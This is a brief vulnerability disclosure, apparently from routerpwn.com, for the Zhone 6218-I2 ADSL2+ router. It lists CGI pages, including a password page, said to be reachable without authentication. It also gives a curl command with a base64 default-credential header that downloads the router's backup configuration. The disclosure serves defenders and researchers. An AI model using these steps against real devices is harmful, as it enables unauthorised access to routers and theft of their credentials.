routerpwn.com
routerpwn.com copied to clipboard
Multiple Vulnerabilities in Zhone ADSL2+ 4 Port Wireless Bridge/Router (Broadcom)
Exploit Title: Multiple Vulnerabilities in Zhone ADSL2+ 4 Port Wireless Bridge/Router (Broadcom)
Date: 01/09/2015
ZHONE Firmware: 03.02.20
Product Name: 6218-I2-xxx
Firmware Link: http://www.zhone.com/support/downloads/cpe/6218-I2/6218-I2_R030220_AnnexA.zip (Login Required)
Author: Mahmoud Khaled
Contact: [email protected]
Patch/ Fix: Vendor has not provided(and wont provide) any fix for this yet
Disclosure Timeline
01/09/2015 Contacted Vendor/Vulnerability Explained 01/09/2015 Vendor Replied Denying Responsibility of The Product 01/09/2015 Full Disclosure
Description
A. The following links can be accessed without any authentication: http://<IP>/pvccfg.cgi http://<IP>/dnscfg.cgi http://<IP>/password.cgi (In addition to text storage of sensitive information)
B. Obtaining backup DSL router configurations by a user account authentication: curl ""http://<IP>/backupsettings.conf"" -H ""Authorization: Basic dXNlcjp1c2Vy"" (""dXNlcjp1c2Vy"" = ""user:user"" in base64)